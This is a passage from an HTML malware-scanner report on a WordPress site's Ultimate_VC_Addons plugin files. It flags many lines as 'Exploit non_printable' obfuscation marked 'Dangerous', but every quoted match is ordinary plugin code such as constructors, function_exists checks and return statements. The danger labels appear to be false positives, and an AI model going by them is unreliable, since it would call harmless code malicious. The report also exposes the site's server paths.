</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_469").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_ColorPicker.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_470" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_ColorPicker_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_colorpicker_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_ColorPicker_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">colorpicker_alpha_gen</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">colorpicker_alpha</span><span style="color: #007700">(</span><span style="color: #0000BB">selector</span><span style="color: #007700">,</span><span style="color: #0000BB">id_prefix</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">hex</span><span style="color: #007700">, </span><span style="color: #0000BB">opacity</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_470").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Spacing.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.00 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_471" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">ultimate_spacing_param_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { if ( </span><span style="color: #DD0000">'post.php' </span><span style="color: #007700">== </span><span style="color: #0000BB">$hook </span><span style="color: #007700">|| </span><span style="color: #DD0000">'post-new.php' </span><span style="color: #007700">== </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">$bsf_dev_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">( </span><span style="color: #DD0000">'dev_mode' </span><span style="color: #007700">); if ( </span><span style="color: #DD0000">'enable' </span><span style="color: #007700">=== </span><span style="color: #0000BB">$bsf_dev_mode </span><span style="color: #007700">) { </span><span style="color: #0000BB">wp_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons_spacing_css'</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_spacing_param_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$dashicon</span><span style="color: #007700">, </span><span style="color: #0000BB">$mode</span><span style="color: #007700">, </span><span style="color: #0000BB">$unit</span><span style="color: #007700">, </span><span style="color: #FF8000">/* $default_value,*/ </span><span style="color: #0000BB">$default_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$key </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_units</span><span style="color: #007700">( </span><span style="color: #0000BB">$unit </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 145</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_spacing_param_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_spacing_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_471").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Responsive.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.80 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_472" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_units</span><span style="color: #007700">( </span><span style="color: #0000BB">$unit </span><span style="color: #007700">) { </span><span style="color: #0000BB">$html </span><span style="color: #007700">= </span><span style="color: #DD0000">'<div class="ultimate-unit-section">'</span><span style="color: #007700">; </span><span style="color: #0000BB">$html </span><span style="color: #007700">.= </span><span style="color: #DD0000">' <label>' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_html</span><span style="color: #007700">( </span><span style="color: #0000BB">$unit </span><span style="color: #007700">) . </span><span style="color: #DD0000">'</label>'</span><span style="color: #007700">; </span><span style="color: #0000BB">$html </span><span style="color: #007700">.= </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">; return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">ultimate_admin_responsive_param_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { if ( </span><span style="color: #DD0000">'pos</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 152</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_responsive_param_media</span><span style="color: #007700">( </span><span style="color: #0000BB">$class</span><span style="color: #007700">, </span><span style="color: #0000BB">$dashicon</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$default_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$unit</span><span style="color: #007700">, </span><span style="color: #0000BB">$data_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 168</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_units</span><span style="color: #007700">( </span><span style="color: #0000BB">$unit </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 180</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_admin_responsive_param_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 78</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_responsive_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_472").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Font_Manager_Param.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.07 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_473" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Font_Manager_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_font_manager_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Font_Manager_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_google_fonts_settings</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_google_fonts_style_settings</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_473").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_ParamHeading.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.81 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_474" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_ParamHeading_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_paramheading_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_ParamHeading_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_param_heading_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_474").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Margin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.06 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_475" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Margin_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_margin_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Margin_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
